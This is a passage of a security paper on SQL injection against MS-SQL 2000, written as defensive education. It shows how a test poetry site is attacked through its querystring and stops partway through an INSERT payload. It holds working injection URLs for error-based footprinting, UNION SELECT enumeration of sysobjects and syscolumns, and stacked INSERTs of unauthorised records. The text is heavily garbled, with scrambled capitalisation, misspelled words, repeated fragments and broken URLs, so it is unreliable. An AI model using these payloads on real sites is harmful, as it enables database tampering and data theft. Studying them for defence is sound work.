By Stuart McDonald Abstract SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack. Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This paper will look at a selection of the methods available to a SQL injection attacker and how they are best defended against Introduction It's drilled into a programmer from "Programming 101":. The importance of input validation and ensuring that the data a user sends you is the data you want, not some poisoned lump Of Characters That's Going to Break Your Site and / or Lose You Your Job. As Valuable As It May Be To Ensure Your Uses Are Crossing Their T's and Dotting Their i's, There '
sa more important reason for this validation and that centres around the principle of SQL injection. When I first stumbled across an SQL injection paper, I gave it a cursory read and then tried a couple of the attacks against a test backend version of a site I . was then looking after Within six hours I had almost totally destroyed the site - and that was without using the more advanced tools available SQL injection is not a "dark art", nor is it new Numerous white papers and other references are available.. on the internet (see references), some of which are over a year old. Yet many sites play the roles of the lowest apples in the tree by being completely vulnerable to this form of attack. As SQL injection how-tos, attacker awareness and Now Even Automated Tools Such As Wpoison That Check for SQL Injection Vulnerabilities Become More Prevalent, There 'Low Apples'
will be harvested at increasing rates Summary This paper consists of five sections Part One - Injection principles:... Yes, it really is this easy Contains a detailed look at the basics of SQL injection This will walk you through the anatomy of an attack. It is only by knowing exactly how an attacker will use SQL injection that you will be in a better position to protect your site Part Two - advanced injection:. Sprocs and the leverage of your position Looks at some of the more advanced methods of SQL injection which can result in system compromise This describes the use of stored procedures and extended stored procedures that come pre-installed on a MS-SQL 2000 set-up It is Microsoft specific Part Three - Protection:... How many walls to build around your site Describes methods for the developer to protect their site and system from these kind of attacks Part Four - Conclusion:. See, it does matter Summarises why the threat of SQL injection is so serious Part Five - refere. nces: The information is out there Contains a detailed listing of references and additional reading Conventions In order to reduce the number of screen shots required in this paper, much of the screen output is colour-coded and is one point smaller instead All URL's.. are blue. All code snippets are red. All error messages are green. Although the examples used are specific to MS-SQL 2000 it should be noted that SQL injection is not an issue isolated to MS-SQL 2000 alone. In part one a cut Down Version of a poetry site is for illustrative purposes. The poetry snippets have been altered where needed and is used with permission. Part One - INJECTION Principles:
Yes, it really is this easy SQL injection is one type of web hacking that requires nothing but port 80 and it might just work even if the admin is patch-happy. "(AntiCrack. 27 May 2002)." SQL injection is usually caused by developers who use 'string-building' techniques in order to execute SQL code. "(SQL Injection FAQ) The principle of basic SQL injection is to take advantage of insecure code on a system connected to the internet in order to pass commands directly to a database and to then take advantage of a poorly secured system to leverage an attacker's access. Most other papers concerned with SQL injection use the example of either a login or search dialogue that is used to gain unauthorised access to the server. to avoid repeating what can be studied in other papers, I will instead look at SQL injection via the querystring, where the goal is to add general data to the database rather than to add a member to a users table. The attack I discuss uses the same principles as thos e in other papers, particularly the SPI Dynamics and NGSSoftware papers, but differs in its execution. The sample site in the following examples makes use of a MS-SQL 2000 database to serve poems presented at poetry readings. The table lay-up is basic . but the real world example is considerably more complicated Two tables, titled author and story, respectively contain the poets' names, nationality and age, and the poem specifics: title, blurb, poem and aID The site lists individual poems and the goal. Is to add an unauthorised poem and an unauthorised author to the database. Hacking the querystring a type ral to read a poem is ask. http://stuart/homebase/practical/index.asp? story =
1 When you visit the above URL you are greeted with a page title (Welcome to Bangkok's Worst Poetry.com), the title of the poem (The Mating of the Mongolian Butterfly), the name (Stuart), nationality (Australian) and age (32) of the poet and a snippet from their poem (Par for the course ...). From this you can infer That the 1 in the querystring is some kind of reason to the actual poem. So, break off the querystring and you get THE FOLLOWING: Story = 1 Change the value of story to 4 and the reload the page with the url: http://stuart/homebase/practical/index.asp? story = 4 We now Have Cheese By Savage Henry, Even Though IT was never called via a link for this particular poem. Next, look at the VB Script code used to create the above (the connection portion of the script is omitted for brevity). <% storyID = request ( "story") StrSql0 = " Select S.SID, S.TITLE, S.BLURB, S.Story, A.aname from Story S, Author a where sid = "& storyid &" and a.Aid = S.AID "RS0.Open Strsql0, Oconn%> The VAR iable we have been playing with - that is, the story value -. is being passed with no input validation straight to the SQL query, which is then retrieving the data This shows we could put anything in there as the value for storyID and it would be passed to the SQL statement. We could send commands to the database that the developer never intended This is the principle behind SQL injection. Breaking the querystring There are two straightforward ways to break a URL. Firstly, you can try adding some SQL to The URL, AS in The Following: http://stuart/homebase/practical/index.asp? story = 3 and someothercolumn =
3 In our example this results in the following error: Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Invalid column name 'someothercolumn' / homebase / practical / index. .asp, Line 33 this Establishes That SQL INJECTION IS POSSIBLE AS We Changed The Sql Statement from: Select S.SID, S.TITLE, S.BLURB, S.Story, A.aname from Story S, Author a Where SID = 3 And A.AID = S.Aid to select S.SID, S.TITLE, S.BLURB, S.Story, A.aname from Story S, Author a where sid = 3 and someothercolumn = 3 and a.AID = s. aID The column "someothercolumn" does not exist, so we get an SQL error The second way to break a page is with an apostrophe:. http:? //stuart/homebase/practical/index.asp story = 3 'The above results in the following server error: error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Unclosed quotation mark before the character string 'AND a.aID = s.aID'. / HomeBase / Practical / in . Dex.asp, line 20 The script has choked because we inserted an apostrophe after the 3, which breaks the SQL statement By inserting the quotation mark, the SQL statement passed to the server was altered from: SELECT s.sID, s.title , S. Blurb, S.Story, A.aname from Story S, Author a where sid = 3 and a.Aid = S.Aid to select S.SID, S.TITLE, S. BLURB, S.Story, A. Aname from story s, author a where sid = 3 'and a.AID =
s.aID The single quotation mark causes an unclosed quotation mark error This is a little unusual as normally an integer would not be quoted in an SQL statement Another example better illustrates the use of a quote:.. Imagine a summary page that lists poets by Nationality. In this case: http://stuart/homebase: http://stuart/homebase/practical/index_country.asp? country = laos and the corresponding sql Would Be: SELECT A, AID, A. Aname from Author a Where A. Nanationality = 'laos' Note The Value laos Is Quote Because It is a string, sowe alter the URL AGAIN, ADDING A Quotation Mark In laos, this Quotation Mark Goes Into The SQL and Breaks It, As Follows: http: //stuart/homebase/practical/index_country.asp?country=la'os SELECT A, AID, A. Aname from Author a where a.aationality = 'la'os' this SQL Statement Will Crash Because of the UNClosed Quotation Mark. GENERLLY An Attacker Will Need To Use A Quotation Mark to Break The SQL, Thoughness THE IS Particularly Poorly Coded TH en they may just be able to add SQL in as in the first example Database foot printing To be successful, an attacker will first need to map out the tables on the database, a process called database foot printing As Beth Breidenbach states:.. " 'Footprinting,' or ide1ing the configuration of the server is one of the first steps in deciding how to attack a site.
(Breidenbach. 2002) The method chosen to do this will depend on how poorly configured the server is. The most reliable method, shown here, is also the slowest. Other methods are covered in Part Two, where the use of stored procedures and extended .. stored procedures to extract the data are discussed to reliably footprint a database, the SQL statement must be broken, which will cause an error from which a plan of the database can be inferred A lot can be learned from error messages: they're very handy when developing but are also very useful for attacking Look at the error message we got above when we added a quotation mark:. error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [ SQL Server] unclosed quotation mark before the character string 'and a.Aid = S.AID'. /Homebase/practical/index.asp, line 20 the important part of this error is the part "and a.AID = S.AID "This Tells An Attacker Both That There Are AT Least Two Tables Being Used to generate this page (Note The a. and s. - the aid above two tables area) could use their commonsense and guess that an aID refers to an author ID and the a and s may refer to author and story (though p for poem would be even easier to guess). But not even that much guessing is necessary, as eventually error Messages Will REVEAL Almost Everything. An Important Point To Note Is That The Snippet Returned in The Error Message (and A.AID =
s.aID) does not reveal the actual table names. This is good practise from a developer's perspective. When you use aliases, do not use the full table name as you are giving away your information cheaply. More on this is covered in Part Three ....................................................... .. % 201 = 1 - The Apostrophe is Removed AS IT IT NOT NEPORY for this portion of the exceffise to work. The% 20 refers to a space, but what is import - this is the equble at the end - this is the equivalent of A Comment and Comments Out Whate Sql May Be appended to the line. The Sql Becomes: Select S.SID, S.TITLE, S.BLURB, S.Story, A.aname from Story S, Author a where sid = 3 Having 1 = 1 - and a.AID = S.AID The - syntax then comments out the ending part of the sql statement. This is very important as without the Ability to do this (IE, IF the - IS CUT OUT OUT OUT V . Ia input validation) SQL injection becomes far more difficult This will create a new error: Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 's.sID'
is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /homebase/practical/index.asp, line 20 An attacker has been advised by the error that there is a column called s. sID. This error has arisen because if you are going to use HAVING, you must also use a GROUP BY, which groups all the fields. Now the attacker must iterate through the fields until they no longer get an error. The next example shows how This is done: http://stuart/homebase/practical/index.asp? story = 3% 20group% 20BY% 20S.SID% 20having% 201 = 1 - The Attacker Has Now Taken the S.SID Field Given to Them and inserted it into the URL, which produces the next error: error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 's.title' is invalid in the select List because it is not contact in Either an aggregate function or the group by clause. /Homebase/practical/index.asp, line 20 now they has dete Rmined the next column name, s.title, which the add to and the repeat the process: http://stuart/homebase/practical/index.asp? story = 3% 20group% 20by% 20s.SID, S.TITLE% 20having% 201 = 1-- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 's.blurb' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /homebase/practical/index.asp, line 20 Which then gives them s.blurb and so on. This can get tedious if the table happens to have many columns. Assume the full table has been deduced We since Following QueryString: http://stuart/homebase/practical/index.asp? story =
3% 20group% 20BY% 20S.SID, S.Title, S. Blurb, S.Story% 20Having% 201 = 1 - This Gives US THE FOLLOWING: ERROR TYPE: Microsoft Ole DB Provider for ODBC Drivers (0x80040E14) [Microsoft ] [ODBC SQL Server Driver] [SQL Server] Column 'a.aName' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /homebase/practical/index.asp, line 20 note the error has switched to the next table, the one with the nickname a When the attacker has inserted all the values into the URL the following is created:. http:? //stuart/homebase/practical/index.asp story = 3 % 20group% 20BY% 20s.SID, S.Title, S. Blurb, S.Story, A.aname, A. Anationality, A.AAGE% 20Having% 201 =
1-- This URL delivers the attacker an error free screen and a poem titled King of the Soi by Chanet To summarise, the attacker so far has learned:. 1. Two tables are used in this page and their nicknames are 'a' and 's'. 2. They Contain At Least The Following Fields (The May Have ": a. A: AID (THEY GOT this One in the Very Start), Aname, Anationality, Aage B . s:. sID, aID (ditto), title, blurb, story 3. A relationship exists between the two tables over the aID field The next challenge is to determine the table names so a record may be inserted to establish table names,. the system table that comes as a part of MS-SQL 2000, called the sysObjects table, is used. The sysObjects table contains information on all the tables within the database being used. The method used to tackle this depends on how the information is being Displayed. in this case, the poem is being pulled from the database and displayed on the screen, so an attacker needs to append a query to this statement using UNION SELECT, but they have to make sure that the original SELECT returns nothing and that the information from their appending query is returned instead. Here is the original and correct statement : Select S.SID, S.TITLE, S. Blurb, S.story, A.aname, A. Anity, A.AAGE from Story S, Author a where sid = 3 and a.AID = S.AID TO GET THE Table name from the sysobjects Table One 10 Normally Use The Following: Select Name from sysobjects where xtype = 'u'
(The U designates a user-defined table) To combine these the story value is assigned a high number so it will not return a valid poem, and then the other statement is added on with UNION. Note that this will not work unless both statements have the same number of fields The attacker has already established how many columns are in the first table, so now they add digits into the second to make them even, as follows:. SELECT s.sID, s.title, s.blurb , S.Story, A.aname, A. Anationality, A.AAGE from Story S, Author a where sid = 999 and a.AID = S.AID Union All SELECT 1, 2, 3, 4, 5, 6, Name From sysobjects where xtype = 'u' THIS Translates Into the Following URL: http://stuart/homebase/practical/index.asp? Story = 334% 20Union% 20all% 20Select% 201, 2, 3, 4, 5, 6 , name% 20FROM% 20sysObjects% 20WHERE% 20xtype = 'U' - The page that results has the text "author" (circled in red) where we expected to see the poet's age, and the other fields are filled with the numbers one Through Six Instead of Valid Information. A Couple of Po INTS: a) 1, 2, 3, 4, 5, 6, Name Are Used Arbitrarily To Fill The Fields with Junk Data. Only The Last Field, Name, IS IMPORTANT. B) Occasionally An Error Will Say The Wrong Data Type HAS been used. In such cases, the field generating the error must be determined and switched to something quoted eg 'one' c) 'name' is used because it is the value being sought. In the sysObjects table the column 'name' contains the table names d) A double dash must be added at the end to comment the remainder of the original statement The attacker now has the name of one of the tables - author now they get the other one http:.... // stuart / Homebase / Practical / INDEX.ASP? Story =
334% 20Union% 20all% 20Select% 201, 2, 3, 4, 5, 6, Name% 20FROM% 20SYSObjects% 20where% 20 (xtype = 'u'% 20and% 20) - They now have two tables, author and story, with at least the following properties: a.author: aID, aName, aNationality, aAge s.story: sID, aID, title, blurb, story Checking can not be overdone in SQL injection . Here, it is necessary to check that these are the complete lists of columns in each of the tables. The SysObjects table can also be used for that, but instead of calling the column 'name' they call the column 'info', which Contains the number of columns in a given table. The syntax is ask.ASPASE/Practical/index.asp? story = 334% 20Union% 20all% 20Select% 201, 2, 3, 4, 5, 6, INFO% 20FROM% 20SysObjects% 20where% 20 (name = 'author') - this returns 4 - So Our Author Table is Complete. But byhen story is run: http://stuart/homebase/practical/index.asp ? story = 334% 20Union% 20all% 20Select% 201, 2, 3, 4, 5, 6, info% 20FROM% 20SysObjects% 20where% 20 (Name = 'story') - this Ret urns 6, a problem as we have only determined 5 of the columns The best way to find out the name of the remaining column is to again make use of the SysObjects table, but in conjunction with the SysColumns table as follows:. http: / /stuart/homebase/practical/index.asp?story=334 Union ALL SELECT 1, 2, 3, 4, 5, 6 ,s columns.name% 20FROM% 20SysObjects, syscolumns% 20where% 20 (Sysobjects. id = sysColumns.id AND sysObjects.name = 'story' AND sysColumns.name not like 'sID' AND sysColumns.name not like 'aID' AND sysColumns.name not like 'title' AND sysColumns.name not like 'blurb' AND Syscolumns.name Not Like 'Story'
) - Which returns 'storydate' and then completes the table The last thing needing to be done before publishing a tome of poetry is to check on the type of each column Strictly speaking in this example it is not necessary, but just to.. Be thorough this is how it is done: http://stuart/homebase/practical/index.asp? story = 334% 20Union% 20Select% 20Sum (AID)% 20FROM% 20author - determining the column type again comes down to reading error messages, iterating through each column and running a SUM on it If the field is numeric the following error (off the above URL) appears:. error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /homebase/practical/index.asp, line 20 However if the field is a text field this error is generated: http:/stuart/homebase/practical/index.asp? story =
334% 20union% 20select% 20sum (aName)% 20from% 20author-- Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum or average aggregate operation can not take A varchar data type/practical/index.asp, line 20 by Running THROUGH THIS: AAGE (VARCHAR), AAGE, AAGE, AAGE, AAGE, AAGE, AAGE (VARCHAR) S.STORY: SID (INT), AID (INT), Title (VARCHAR), BLURB (VARCHAR), Story (varchar), Storydate (VARCHAR) Adding Unauthorised Data with The Information Garnered In The Database Foot Printing Section, it is now possible to inject a valid INSERT statement to the database First the attacker needs to enter the poet name (author), for instance as follows:. INSERT INTO author VALUES ( 'Dante', 'Italian', '89') http : //stuart/homebase/practical/index.asp? story = 999; INSERT% 20InTo% 20AUTHOR% 20 VALUES% 20 ('Dante', 'Italian', '89') - No Error Message Appears, The Record APPEARS To Have Been E . Ntered correctly However, the aID, which needs to be entered into the story table remains unknown To obtain this, it's necessary to run another query:. Http: //stuart/homebase/practical/index.asp story = 334% 20UNION? % 20 AlL% 20Select% 201, 2, 3, 4, 5, 6, AID% 20FROM% 20AUTHOR% 20where% 20 (Aname = 'Dante') - Which Returns 10 - The Aid for Dante. The last step is to insert THE POEM INTO The Story Table. S.Story: SID (int), AID (int), Title (varchar), blurb (varchar), story (varchar), storydate (varchar) Taking a guess at the insert statement, produces Something Like this: INSERT INTO Story Values (10, 'I Love Som Tam ",' Som Tam Is A Spicy Thai Salad and this Is A Poem About IT ',' SOM TAM IS SO Spicy,
